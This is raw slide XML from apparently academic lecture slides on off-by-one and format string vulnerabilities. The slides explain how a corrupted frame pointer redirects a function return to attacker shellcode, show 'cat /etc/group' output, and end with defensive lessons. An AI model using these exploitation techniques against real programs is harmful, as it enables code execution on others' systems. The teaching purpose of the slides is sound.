          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48800005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1140765" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140753" idx="1"/>
            <a:endCxn id="1140750" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1400175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140766"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40767"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0768"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5869813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4278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279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4279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4279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4279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4279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79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79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4279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4279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4280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4280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4280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4280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4280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80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80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4280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4280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42811" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142803" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2819400" y="4572000"/>
            <a:ext cx="3657600" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1142812" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142802" idx="1"/>
            <a:endCxn id="1142791" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2257425"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1142813" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142801" idx="1"/>
            <a:endCxn id="1142800" idx="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1142814"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42815"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2817" name="Text Box 33"/>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1142820" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4400550"/>
            <a:ext cx="2209800" cy="584776"/>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main: return 0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35"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6"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7"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41036436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a:t>What Happens Next?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144835" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() returns, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> points to &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When main() returns, the return sequence has the following effects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> takes the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> increases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value by 4 (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upon return (ret), the pc is set to the value at the address of the stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8801112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965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965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965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965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965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965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966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966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966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966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966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966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966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7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967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967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9673" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1179667" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2819400" y="3086100"/>
            <a:ext cx="3657600" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1179674" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1179666" idx="1"/>
            <a:endCxn id="1179655" idx="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sp>
        <p:nvSpPr>
          <p:cNvPr id="1179675" name="Rectangle 27"/>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9676" name="Rectangle 28"/>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9678" name="AutoShape 30"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="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1179679" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2914651"/>
            <a:ext cx="554058"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main()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17733374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1461"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1462"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1463"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1464"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1465"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1467"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68"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69"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1470"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1471"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1472"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1473"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1474"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1475"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1476"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77"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78"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1479"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1480"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1481" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1171475" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2260226" y="3414921"/>
            <a:ext cx="4216774" cy="1471404"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1171482" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1171474" idx="1"/>
            <a:endCxn id="1171463" idx="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sp>
        <p:nvSpPr>
          <p:cNvPr id="1171484"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1485"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1488" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="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428182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E1EC-1669-2C25-1A6D-E87A47C35241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DCFE51-8F26-108C-1F8F-0CC72FDA8F4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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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root:x:0:</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daemon:x:1:</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bin:x:2:</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sys:x:3:</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dip:x:30:parallels,vigna</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vigna:x:1001:</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87522433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7350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351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351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351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351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351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1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1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351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351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352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352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352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352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352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2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2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7352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352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3529" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1173523"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1173532"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3533"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3536" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1173537" name="AutoShape 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1173521" idx="1"/>
            <a:endCxn id="1173511" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2257425"/>
            <a:ext cx="1588" cy="205740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382210083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5557"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5558"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5559"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5560"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5561"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5563"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64"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65"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5566"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5567"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5568"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5569"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5570"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5571"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5572"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73"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74"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5575"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5576"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5577" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175571" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4074349"/>
            <a:ext cx="3886200" cy="811976"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1175578" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175570" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4953000" y="1828800"/>
            <a:ext cx="1524000" cy="2771775"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175580"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5581"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5584" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175569" idx="1"/>
            <a:endCxn id="1175558" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1971675"/>
            <a:ext cx="1588" cy="234315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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>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a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415852766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760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760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760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760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760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761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1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1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761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761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761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761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761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761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762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2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2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762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762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7625" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1177619" idx="1"/>
            <a:endCxn id="1177607" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2257425"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48300005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1177626" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1177617" idx="1"/>
            <a:endCxn id="1177622" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1685925"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177628"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7629"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7633" name="AutoShape 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4953000" y="1828800"/>
            <a:ext cx="1524000" cy="2771775"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>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a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133064858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Lessons Learned	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loops must be thoroughly checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-supplied input should not lead to arbitrary loop iterations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Off-by-one vulnerabilities can cause crashes and also the execution of arbitrary code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22489305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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How is Overwritten:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format String Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(... char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function is used with user-supplied input it is possible to read/write values in the process memory by providing a carefully crafted format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(“Hello %s!\n”, name);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is not! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will be interpreted as a format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=“%d %d”</a:t>
            </a:r>
            <a:r>
